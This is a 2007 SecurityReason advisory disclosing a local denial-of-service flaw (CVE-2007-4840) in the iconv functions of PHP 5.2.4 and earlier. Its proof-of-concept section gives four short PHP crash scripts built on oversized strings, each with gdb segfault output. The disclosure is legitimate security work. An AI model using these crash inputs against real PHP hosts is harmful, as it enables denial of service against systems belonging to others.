|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3122 CVE : CVE-2007-4840 SecurityRisk : Low  (About) Remote Exploit : No Local Exploit : Yes Exploit Available : Yes Credit : laurent gaffie Published : 13.09.2007
Advisory Content : Application: PHP <=5.2.4 Web Site: http://php.net Platform: unix Bug: denial of service function: iconv(),iconv_strlen(),iconv_mime_decode(),iconv_mime_decode_headers() special condition: default php-memory-limit ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Greets 5) Credits =========== 1) Introduction =========== "PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML." ====== 2) Bug ====== multiple Iconv funtions are vulnerable to a denial of service. ===== 3)Proof of concept ===== /* debian:~# php -v PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15) Copyright (c) 1997-2007 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies */ Proof of concept example : 1) iconv() <?php $a = str_repeat("/", 4199000); iconv(1, $a, 1); ?> (gdb)run 1.php Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1217608000 (LWP 29444)] 0xb76ed3e5 in iconv_close () from /lib/tls/libc.so.6 2) iconv_mime_decode_headers() <?php $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a); ?> (gdb) run 2.php Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1216760128 (LWP 29475)] 0xb78a69ef in _dl_open () from /lib/tls/libc.so.6 3)iconv_mime_decode() (gdb) run 3.php <?php $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a); ?> Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1217227072 (LWP 29518)] 0xb78349ef in _dl_open () from /lib/tls/libc.so.6 4)iconv_strlen() <?php $a = str_repeat("/", 9791999); iconv_strlen(1, $a); ?> (gdb) run 4.php Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1216637248 (LWP 29543)] 0xb77d9d1b in iconv_open () from /lib/tls/libc.so.6 ======== 4)Greets ======== Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone & #nibbles ===== 5)Credits ===== Laurent gaffie contact : laurent.gaffie (at) gmail (dot) com [email concealed] stay tuned, site comming soon ....  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |